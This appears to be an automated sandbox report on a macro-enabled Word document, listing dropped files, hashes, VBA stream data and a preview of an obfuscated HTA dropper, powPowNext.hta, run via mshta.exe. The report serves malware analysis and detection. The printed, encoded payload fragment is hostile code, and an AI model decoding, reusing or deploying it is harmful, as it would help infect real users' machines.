                                                                                                                                              Preview: ...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface
                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\warning[1]
                                                                                                                                              Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                              File Type:GIF image data, version 89a, 36 x 38
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1062
                                                                                                                                              Entropy (8bit):4.517838839626174
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:z4ENetWsdvCMtkEFk+t2cd3ikIbOViGZVsMLfE4DMWUcC/GFvyVEZd6vcmadxVtS:nA/ag/QSi6/LKZzqKVQgJOexQkYfG6E
                                                                                                                                              MD5:124A9E7B6976F7570134B7034EE28D2B
                                                                                                                                              SHA1:E889BFC2A2E57491016B05DB966FC6297A174F55
                                                                                                                                              SHA-256:5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9
                                                                                                                                              SHA-512:EA1B3CC56BD41FC534AAC00F186180345CB2C06705B57C88C8A6953E6CE8B9A2E3809DDB01DAAC66FA9C424D517D2D14FA45FBEF9D74FEF8A809B71550C7C145
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: GIF89a$.&.......h...............h.hh..h..h..h..h....h................h.................h.................h................hh.h..h..h..h..h.hhhhh.hh.hh.hh.hh..hh.h..h..h.h..h..hh.h..h..h..h..h..hh.h..h..h..h..h..hh.h..h..h..h..h...h...............h.hh..h..h..h..h....h...............h................h...........h.................h...............h.hh..h..h..h..h....h................h.................h.................h.................h..............h.hh.h..h..h..h....h..............h................h................h................h...............h.hh..h..h..h..h....h................h.................h.................h......................................................................................................................................!.......,....$.&.@......H.......<0.....VXQH..C..1>.(..@..C.t.q"B..S.\.r.D...Z.. .M.41.".......<.r.;.r4..P..]....+.T-...N...x....1.:..TdD...^.j..W.r...y....V...Lx0..):8p q.4.;...f`.r-K...(..P....t.].~..l..
                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\error[1]
                                                                                                                                              Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1706
                                                                                                                                              Entropy (8bit):5.274543201400288
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:NIAbzyYh8rRLkRVNaktqavP61GJZoF+SMy:xWqxztqaHO
                                                                                                                                              MD5:B9BEC45642FF7A2588DC6CB4131EA833
                                                                                                                                              SHA1:4D150A53276C9B72457AE35320187A3C45F2F021
                                                                                                                                              SHA-256:B0ABE318200DCDE42E2125DF1F0239AE1EFA648C742DBF9A5B0D3397B903C21D
                                                                                                                                              SHA-512:C119F5625F1FC2BCDB20EE87E51FC73B31F130094947AC728636451C46DCED7B30954A059B24FEF99E1DB434581FD9E830ABCEB30D013404AAC4A7BB1186AD3A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: ...window.onerror = HandleError..function HandleError(message, url, line)..{..var str = L_Dialog_ErrorMessage + "\n\n"..+ L_ErrorNumber_Text + line + "\n"..+ message;..alert (str);..window.close();..return true;..}..function loadBdy()..{..var objOptions = window.dialogArguments;..btnNo.onclick = new Function("btnOKClick()");..btnNo.onkeydown = new Function("SwitchFocus()");..btnYes.onclick = new Function("btnYesClick()");..btnYes.onkeydown = new Function("SwitchFocus()");..document.onkeypress = new Function("docKeypress()");..spnLine.innerText = objOptions.getAttribute("errorLine");..spnCharacter.innerText = objOptions.getAttribute("errorCharacter");..spnError.innerText = objOptions.getAttribute("errorMessage");..spnCode.innerText = objOptions.getAttribute("errorCode");..txaURL.innerText = objOptions.getAttribute("errorUrl");..if (objOptions.errorDebug)..{..divDebug.innerText = L_ContinueScript_Message;..}..btnYes.focus();..}..function SwitchFocus()..{..var HTML_KEY_ARROWLEFT = 37;..
                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Public.LNK
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Wed Apr 11 22:38:20 2018, mtime=Fri Nov 12 19:13:31 2021, atime=Thu Jun 27 13:51:23 2019, length=4096, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):819
                                                                                                                                              Entropy (8bit):4.627919257372728
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:8N1rAipUKMcduCHqXacXgACmYjAs/zP5vnU544t2Y+xIBjKZm:8nrpOn8As7Rvt7aB6m
                                                                                                                                              MD5:465C0AEC837CC8697C8CD57F5A66FB05
                                                                                                                                              SHA1:76B352C132EB8DC5A21CCCAED74850D17854C229
                                                                                                                                              SHA-256:3222129BED9852295A68A9FA4ED4BFF0312F13048A65457E458498196FA9A057
                                                                                                                                              SHA-512:9BE21F17C26E1ED0F7B7D3353389F0978EDD9CD122948A87563987F0199D8AD0610882C35F40429AB8E5B65FDF950E9011BC11B3B878FC16AC7745B4553B3BB5
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: L..................F...........,.....C......$N...,..........................#....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..lS......................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1......Nlv..Public..f......L.lS......................<......o2.P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.......>...............-.......=...........>.S......C:\Users\Public........\.....\.....\.....\.....\.....\.P.u.b.l.i.c..........v..*.cM.jVD.Es.!...`.......X.......138727...........!a..%.H.VZAj...................!a..%.H.VZAj..............................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):152
                                                                                                                                              Entropy (8bit):4.854413843465438
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:bDuMJlULQwXULXLpzCtYrSN7lAdRLUlmxWHixwXULXLpzCmxWIMovLAdRLUlv:bCjxXUZzUYrkOTAZNXUZzH0TA1
                                                                                                                                              MD5:DCA4A396D04FA90AA6FFE392A9C095E8
                                                                                                                                              SHA1:16DA2BBD8D79B762920FEE5575281549B85D369C
                                                                                                                                              SHA-256:02AD6424B4261833587959DB735F9910EE0A7B2347A2377661632FABCD9E9EE6
                                                                                                                                              SHA-512:51CB2A414E0D6A0EB7841F4585DB10444849C3DDBC4D456BBB87AB088781940D3E7708AEC3EFBBB12302D890F71535E25423704B26CD0161EE55A60E093DFFFC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: [folders]..Templates.LNK=0..instruct_11.21.doc.LNK=0..Public.LNK=0..powPowNext.LNK=0..[misc]..instruct_11.21.doc.LNK=0..[misc??????]..powPowNext.LNK=0..
                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\instruct_11.21.doc.LNK
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:50 2020, mtime=Fri Nov 12 19:13:29 2021, atime=Fri Nov 12 19:13:26 2021, length=34817, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1100
                                                                                                                                              Entropy (8bit):4.688398802108855
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:8BFf0hRUKMcduCH2PONVlR4TNAg0+W5klFRQAjAR/DUAnNoDdFA44t2Y+xIBjKZm:8BF6l/NVlkAglKUARbUAmDT7aB6m
                                                                                                                                              MD5:E7FEFD635F09309203942DD2078DAAA8
                                                                                                                                              SHA1:71C3C48FD94F3A41F5F104CE9F2DE7E44503160C
                                                                                                                                              SHA-256:916725731AAB0FFD39E33670CC9B3BA7AAA6E14DB49490AFA69CAC72764B6F84
                                                                                                                                              SHA-512:4126CA0CD6470DFB6971D6218055A2228518D268107AE1740618F6469F085CE161EDD69AE1A4FFFFA83D7FD23B7BC698DF9E0D7E5E15AA2BB579C5740A782E9B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: L..................F.... .....R....-&:.....KP]..................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..lS......................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q{<..user.<.......N..lS......#J.....................r..j.o.n.e.s.....~.1.....>Q.<..Desktop.h.......N..lS.......Y..............>......&..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2.....lS.. .INSTRU~1.DOC..`......>Qz<lS.......V........................i.n.s.t.r.u.c.t._.1.1...2.1...d.o.c...d.o.c.m.......]...............-.......\...........>.S......C:\Users\user\Desktop\instruct_11.21.doc.docm........\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.i.n.s.t.r.u.c.t._.1.1...2.1...d.o.c...d.o.c.m.........:..,.LB.)...As...`.......X.......138727...........!a..%.H.VZAj....................!a..%.H.VZAj...............................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0
                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\powPowNext.LNK
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Nov 12 19:13:31 2021, mtime=Fri Nov 12 19:13:31 2021, atime=Fri Nov 12 19:13:31 2021, length=3346, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):970
                                                                                                                                              Entropy (8bit):4.675319441234502
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:8ChbPUKMcduCHqX8xcXaACmC0cjCyJhfsagAjAwg/H9UtAs3vn+b44t2Y+xIBjKU:8QOs6YjCyJhfNgUAhVU6kvp7aB6m
                                                                                                                                              MD5:7C3333CE0D78A49B4FFF38D2B04184AF
                                                                                                                                              SHA1:B1CE6C24AEC6C182B448A005AFFC1435E3904D34
                                                                                                                                              SHA-256:9541DF2DD7BFE2BA09B7CDAAA64241ACF795D6BB3BA7727934B074A18096AE85
                                                                                                                                              SHA-512:2388C276BDD60877B6C5996AA227A373E8324420AF0A977875BCC35060172147388A0766356E999E97E848507AF38A538882AEAD77D43378B0B2D60A6D9425AA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: L..................F.... ...q........@X......@X..................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..lS......................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1.....lS....Public..f......L.lS......................<.......7.P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....j.2.....lS.. .POWPOW~1.HTA..N......lS..lS......w.......................Q.p.o.w.P.o.w.N.e.x.t...h.t.a.......M...............-.......L...........>.S......C:\Users\Public\powPowNext.hta..'.....\.....\.....\.....\.....\.....\.P.u.b.l.i.c.\.p.o.w.P.o.w.N.e.x.t...h.t.a..........v..*.cM.jVD.Es.!...`.......X.......138727...........!a..%.H.VZAj...................!a..%.H.VZAj..............................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):162
                                                                                                                                              Entropy (8bit):2.3801933752302675
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Rl/ZdR3ltl/l/hZleN8uVXL+z/lXGxXT:RtZTVtJbeN8uVXLUw
                                                                                                                                              MD5:95C14D156764B73CF96CCC17D84EB18A
                                                                                                                                              SHA1:D80ACFC1D099FEBDD2F72F340AB4C9CC198B3849
                                                                                                                                              SHA-256:488020AAB3E0B07FC9B52A490063B520A82D5F9BDA874E4B021E41DBA5848D9C
                                                                                                                                              SHA-512:36E9EB26A20DBD7F265C666DD608BEA214AD36A905494E921FFE1191FF09EE80C6ABECAF5BC090BAD1E708615D3E75726871EBC36D34CB180455E15C3C1144E1
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: .pratesh................................................p.r.a.t.e.s.h.........e...............................i...............................m...............$...
                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):20
                                                                                                                                              Entropy (8bit):2.8954618442383215
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:QVNliGn:Q9rn
                                                                                                                                              MD5:C4F79900719F08A6F11287E3C7991493
                                                                                                                                              SHA1:754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
                                                                                                                                              SHA-256:625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
                                                                                                                                              SHA-512:0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: ..p.r.a.t.e.s.h.....
                                                                                                                                              C:\Users\user\Desktop\~$struct_11.21.doc.docm
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):162
                                                                                                                                              Entropy (8bit):2.3801933752302675
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Rl/ZdR3ltl/l/hZleN8uVXL+z/lXGxXT:RtZTVtJbeN8uVXLUw
                                                                                                                                              MD5:95C14D156764B73CF96CCC17D84EB18A
                                                                                                                                              SHA1:D80ACFC1D099FEBDD2F72F340AB4C9CC198B3849
                                                                                                                                              SHA-256:488020AAB3E0B07FC9B52A490063B520A82D5F9BDA874E4B021E41DBA5848D9C
                                                                                                                                              SHA-512:36E9EB26A20DBD7F265C666DD608BEA214AD36A905494E921FFE1191FF09EE80C6ABECAF5BC090BAD1E708615D3E75726871EBC36D34CB180455E15C3C1144E1
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: .pratesh................................................p.r.a.t.e.s.h.........e...............................i...............................m...............$...
                                                                                                                                              C:\users\public\powPowNext.hta (copy)
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3346
                                                                                                                                              Entropy (8bit):5.726896594481782
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:bGotzrVgMR61CQB7MGxag4hE8h9LU9fLtrlv:yCrVnuPMGByEkmp
                                                                                                                                              MD5:FA2B89027304712FB8366C1F6B4F2827
                                                                                                                                              SHA1:6F851332C08998D25D839112A5C9D3CA8E57FCC0
                                                                                                                                              SHA-256:6E1338E07405A9B14DB254B9769767EA824CF3AC1C8DFECB3513E95135ECEAEE
                                                                                                                                              SHA-512:8C1705A8165C062D9413F6FC00A697F6E62D038A04D5A347D036B73A97A64FE1831038C8007A1F29F80A2F765C5428463CEAE9EAF53FAED558752F24A32744CD
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: <html><body><div id='youGirlYou' style='font-color: #000'>lave</div><div id='karolLikeDow' style='font-color: #000'>2FmcgcWayxGTptWZE92byBSPg4WZ3BSQjRXa2VGWPJmalNGdoISbzhXbsJjL41GboRHdwJSK7cWayxGTptWZE92by5ybwVmboIyRFRlIsAiIoRHdwpzLvMHavVHbkVmclxGbp9Gd0RmLj9WbvI2bvx2avEFbhp0a4MkN2lVcJlXR3JGZ5BnQIZ3M5pkUvcncXdlTDR0L3cDNyczLiVmY5NHO/MWak1jQtlzYBBlJ3BFO6h2aL1TYOx0QzImSDhmWNVzRhVXSCZSPTBTTSN1NyoWc0t2TSh3SBNTaVtmakNlIsAiZhx2cllyOnlmcsxUarVGRv9mcuMXZuRGKpsTamhyZpJHbMl2alR0bvJnLzRXY0V3cg0TPgIDMwkye0JXe7ZXYyByahJ3bsl1b1dUayxGI9AibldHIBNGdpZXZY9kYqV2Y0hiIhR2bkJmLzRnclFWbikyOrFmcvxWWvV3RpJHbu8Gcl52OrFmcvxWWvV3RpJHbuQXewVGI9ASM7sWYy9GbZ9WdHlmcs5ydylGdlhyZpJHbMl2alR0bvJnLyV2cw9mbzVmYvRWepszahJ3bsl1b1dUayxmLzFmdlR3bmlGblhiIjpDXcV3clJ3ccxFc1JGbpNGXcRXdiV2RpJHbM9WYk5iawdmIsAiMpszahJ3bsl1b1dUayxmLjx2bzV2O9NWY0NGaoUWK71Xf|||==gdhJHInlmcsxUarVGTvZXZg0DIuV2dgE0Y0lmdlh1TipWZjRHKic3cjJXawRnLzhWZsxmIpsjdhJHI59WdQ92dUVnYlBSPg4WZ3BSQjRXa2VGWPJmalNGdoIycjJXawRXaudmLmlGblNXezRXZt9mYqV2Y0JSK7cWayxGTptWZM9mdl5ic1

                                                                                                                                              Static File Info

                                                                                                                                              General

                                                                                                                                              File type:Microsoft Word 2007+
                                                                                                                                              Entropy (8bit):7.793957028458385
                                                                                                                                              TrID:
                                                                                                                                              • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
                                                                                                                                              • Word Microsoft Office Open XML Format document (49504/1) 32.35%
                                                                                                                                              • Word Microsoft Office Open XML Format document (43504/1) 28.43%
                                                                                                                                              • ZIP compressed archive (8000/1) 5.23%
                                                                                                                                              File name:instruct_11.21.doc.docm
                                                                                                                                              File size:34817
                                                                                                                                              MD5:a9490d94cf547e27dcc0d52dc72e74e7
                                                                                                                                              SHA1:a00e440eb13f84c8b8faba5b81a7d85fce2a4074
                                                                                                                                              SHA256:ee103f8d64cd8fa884ff6a041db2f7aa403c502f54e26337c606044c2f205394
                                                                                                                                              SHA512:43dddc14679f16735c6f74c1b3d40b0be23bf995e9dd9a49ab9cd780cac6314a15ce73ab3943cf3346bbc77be2b2355ac6a8723c56d1ebe6872c9697f5048bc4
                                                                                                                                              SSDEEP:384:xS6JqYxSJTvfpHhx/gFj0EEYpcVhE1ltmTV/YZO4NSCWl822TnUCSdQQUfwliiid:ZJqY0phb4a02VWnZdw9822zAEhXd
                                                                                                                                              File Content Preview:PK..........!...O.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                              File Icon

                                                                                                                                              Icon Hash:74fcd0d2f692908c

                                                                                                                                              Static OLE Info

                                                                                                                                              General

                                                                                                                                              Document Type:OpenXML
                                                                                                                                              Number of OLE Files:1

                                                                                                                                              OLE File "/opt/package/joesandbox/database/analysis/520837/sample/instruct_11.21.doc.docm"

                                                                                                                                              Indicators

                                                                                                                                              Has Summary Info:False
                                                                                                                                              Application Name:unknown
                                                                                                                                              Encrypted Document:False
                                                                                                                                              Contains Word Document Stream:
                                                                                                                                              Contains Workbook/Book Stream:
                                                                                                                                              Contains PowerPoint Document Stream:
                                                                                                                                              Contains Visio Document Stream:
                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                              Flash Objects Count:
                                                                                                                                              Contains VBA Macros:True

                                                                                                                                              Summary

                                                                                                                                              Title:
                                                                                                                                              Subject:
                                                                                                                                              Author:ozdgjmh
                                                                                                                                              Keywords:ath.txeNwoPwop\cilbup\sresu\:c
                                                                                                                                              Template:Normal
                                                                                                                                              Last Saved By:&#1055;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1100; Windows
                                                                                                                                              Revion Number:2
                                                                                                                                              Total Edit Time:0
                                                                                                                                              Create Time:2021-11-10T09:34:00Z
                                                                                                                                              Last Saved Time:2021-11-10T09:34:00Z
                                                                                                                                              Number of Pages:1
                                                                                                                                              Number of Words:116
                                                                                                                                              Number of Characters:9917
                                                                                                                                              Creating Application:Microsoft Office Word
                                                                                                                                              Security:0

                                                                                                                                              Document Summary

                                                                                                                                              Number of Lines:42
                                                                                                                                              Number of Paragraphs:1
                                                                                                                                              Thumbnail Scaling Desired:false
                                                                                                                                              Company:
                                                                                                                                              Contains Dirty Links:false
                                                                                                                                              Shared Document:false
                                                                                                                                              Changed Hyperlinks:false
                                                                                                                                              Application Version:16.0000

                                                                                                                                              Streams with VBA

                                                                                                                                              VBA File Name: ThisDocument.cls, Stream Size: 2271
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/ThisDocument
                                                                                                                                              VBA File Name:ThisDocument.cls
                                                                                                                                              Stream Size:2271
                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . L / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . l . m . E . , l R . . . D . m 7 ^ e . . F . s 2 Z . g w . . . . . . . . . . . . . . . . . . . . . | . . K . . . K . . ; . > . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . | . . K . . . K . . ; . > . | . . . . l . m . E . , l R . . . D . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                              Data Raw:01 16 03 00 06 00 01 00 00 b4 04 00 00 e4 00 00 00 ea 01 00 00 e2 04 00 00 f0 04 00 00 e4 06 00 00 03 00 00 00 01 00 00 00 4c 2f ec fa 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 d6 0d 8e 6c a5 6d c7 45 97 2c 6c 52 13 2e a9 44 06 6d 37 5e 65 13 f2 46 b7 73 32 5a ed 67 77 90 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                              VBA Code
                                                                                                                                              VBA File Name: main.bas, Stream Size: 1122
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/main
                                                                                                                                              VBA File Name:main.bas
                                                                                                                                              Stream Size:1122
                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . L / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                              Data Raw:01 16 03 00 00 f0 00 00 00 9a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff a1 02 00 00 a1 03 00 00 00 00 00 00 01 00 00 00 4c 2f 2e e2 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                              VBA Code

                                                                                                                                              Streams

                                                                                                                                              Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 394
                                                                                                                                              General
                                                                                                                                              Stream Path:PROJECT
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Stream Size:394
                                                                                                                                              Entropy:5.28471344287
                                                                                                                                              Base64 Encoded:True
                                                                                                                                              Data ASCII:I D = " { A A 3 4 7 5 E 1 - 1 0 B 7 - 4 6 7 2 - 9 5 8 4 - C 9 3 4 8 5 4 D 1 D 0 2 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = m a i n . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " B 1 B 3 2 C 5 4 3 0 5 4 3 0 5 4 3 0 5 4 3 0 " . . D P B = " 6 2 6 0 F F 4 C B 1 4 D B 1 4 D B 1 " . . G C = " 1 3 1 1 8 E 1 F 3 E 2 0 3 E 2 0 C 1 " . . . . [ H o s t E x t e n d e
                                                                                                                                              Data Raw:49 44 3d 22 7b 41 41 33 34 37 35 45 31 2d 31 30 42 37 2d 34 36 37 32 2d 39 35 38 34 2d 43 39 33 34 38 35 34 44 31 44 30 32 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 6d 61 69 6e 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56
                                                                                                                                              Stream Path: PROJECTwm, File Type: data, Stream Size: 56
                                                                                                                                              General
                                                                                                                                              Stream Path:PROJECTwm
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:56
                                                                                                                                              Entropy:3.05665670746
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . m a i n . m . a . i . n . . . . .
                                                                                                                                              Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 6d 61 69 6e 00 6d 00 61 00 69 00 6e 00 00 00 00 00
                                                                                                                                              Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3229
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/_VBA_PROJECT
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:3229
                                                                                                                                              Entropy:4.37746268314
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                                                                                                                                              Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                              Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 1874
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/__SRP_0
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:1874
                                                                                                                                              Entropy:3.57587931409
                                                                                                                                              Base64 Encoded:False
